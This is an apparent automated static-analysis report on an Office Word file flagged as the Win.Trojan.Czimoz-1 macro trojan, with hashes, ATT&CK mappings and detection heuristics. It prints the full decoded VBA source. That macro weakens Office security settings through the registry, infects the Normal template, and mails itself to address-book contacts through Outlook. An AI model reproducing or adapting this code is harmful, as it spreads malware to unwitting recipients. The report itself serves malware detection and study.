Win.Trojan.Czimoz-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 798d3d1de186226a…

MALICIOUS

Office (OLE)

Size: 31.5 KB
Created: 2006-03-31 13:57:00
Authoring application: Microsoft Office Word
First seen: 2012-06-14
MD5: ade05b8527700fae15450ea3e9438e43
SHA-1: f6ff08de971606d6dcc9e116a9d8b404a3caaf75
SHA-256: 798d3d1de186226a3b314942a4116dc6df780b5342e53d410c9487522570fde1
Risk score: 262

Malware Insights

Win.Trojan.Czimoz-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder
  • T1566.001 Spearphishing Attachment

The VBA macro triggers critical heuristics for Shell() calls and CreateObject, indicating that it attempts to execute arbitrary code. It also writes to registry keys that control Office security settings, most likely to lower them and facilitate further execution. The macro's intent appears to be to display a social engineering lure to the user, as evidenced by constructed strings such as 'Make your dreams come true!'.

Heuristics (7)

  • ClamAV: Win.Trojan.Czimoz-1 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Czimoz-1
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA [critical] OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched lines in script:
      Rem Word2007.zabijaka (c)by Necronomikon[DCA]
      Dim s(3) As String, e, shell
      Dim f(3) As String, lang
  • CreateObject call [high] OLE_VBA_CREATEOBJ
    CreateObject call
    Matched lines in script:
      Dim f(3) As String, lang
      Set shell = CreateObject(("WScript" + ".Shell"))
      RegPath = "HKCU\Software\Microsoft\Office\12.0\Word\Security\"
  • CallByName call [high] OLE_VBA_CALLBYNAME
    CallByName call
    Matched lines in script:
      shell.RegWrite "HKCU\Software\Office\12.0\Word\Options\DefaultFormat", "Doc97"
      M = CallByName(VBE.ActiveCodePane.codemodule, "Lines", VbGet, 1, 61)
      If CallByName(Application, "MacroContainer", VbGet) = NormalTemplate Then
  • Reference to Windows Script Host [high] SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.microsoft.com/office/officeart/2005/8/oartml (found in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename    Kind        Source                                                Size
macros.bas  vba-macro   oletools.olevba.extract_macros (decoded VBA source)   2464 bytes
SHA-256: c617df92ad1c1b9b7012832c7fd3964d0572f6bdb2f8cee6a7621452189f0ed6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_close()
Rem Word2007.zabijaka (c)by Necronomikon[DCA]
Dim s(3) As String, e, shell
Dim f(3) As String, lang
Set shell = CreateObject(("WScript" + ".Shell"))
RegPath = "HKCU\Software\Microsoft\Office\12.0\Word\Security\"
shell.RegWrite RegPath & "Level", 1, "REG_DWORD"
shell.RegWrite RegPath & "AccessVBOM", 1, "REG_DWORD"
RegPath1 = "HKCU\Software\Microsoft\Office\12.0\Outlook\Security\"
shell.RegWrite RegPath1 & "Level", 1, "REG_DWORD"
shell.RegWrite "HKCU\Software\Office\12.0\Word\Options\DefaultFormat", "Doc97"
M = CallByName(VBE.ActiveCodePane.codemodule, "Lines", VbGet, 1, 61)
If CallByName(Application, "MacroContainer", VbGet) = NormalTemplate Then
Set k = ActiveDocument.VBProject.vbcomponents(1).codemodule
Else
Set k = NormalTemplate.VBProject.vbcomponents(1).codemodule
End If
CallByName k, "Deletelines", VbMethod, 1, CallByName(k, "Countoflines", VbGet)
CallByName k, "Addfromstring", VbMethod, M
f(1) = "Readme.doc"
f(2) = "Password.doc"
f(3) = "Help.doc"
lang = shell.RegRead("HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\")
If (lang = "00000407") Then
s(1) = "Mach deine Träume wahr!"
s(2) = "Willst du ficken?"
s(3) = "Könnten Sie mir helfen?"
ElseIf (lang = "00000415") Then
s(1) = "Spelnij swoje marzenia!"
s(2) = "Chce cie jebac?"
s(3) = "Czy moze mi pan pomóc?"
Else
s(1) = "Make your dreams come true!"
s(2) = "Wanna fuck?"
s(3) = "Can you help me?"
End If
Randomize
e = Int(Rnd * 3) + 1
RandomSubject = s(e)
q = Int(Rnd * 3) + 1
Randomfilez = f(q)
Set Ne_OApp = CreateObject(("Outlook." + "Application"))
Set Ne_Mapi = Ne_OApp.GetNameSpace(("MA" + "PI"))
For Each Ne_AddList In Ne_Mapi.AddressLists
Next
If Ne_AddList.AddressEntries.Count <> 0 Then
For Ne_AddListCount = 1 To Ne_AddList.AddressEntries.Count
Next
Set Ne_AddListEntry = Ne_AddList.AddressEntries(Ne_AddListCount)
Set Ne_msg = Ne_OApp.CreateItem(0)
Ne_msg.To = Ne_AddListEntry.Address
Ne_msg.Subject = RandomSubject
Ne_msg.Body = ""
Ne_msg.Attachments.Add Randomfilez
Ne_msg.Importance = 2
Ne_msg.DeleteAfterSubmit = True
End If
If Ne_msg.To <> "" Then
Ne_msg.Send
End If
End Sub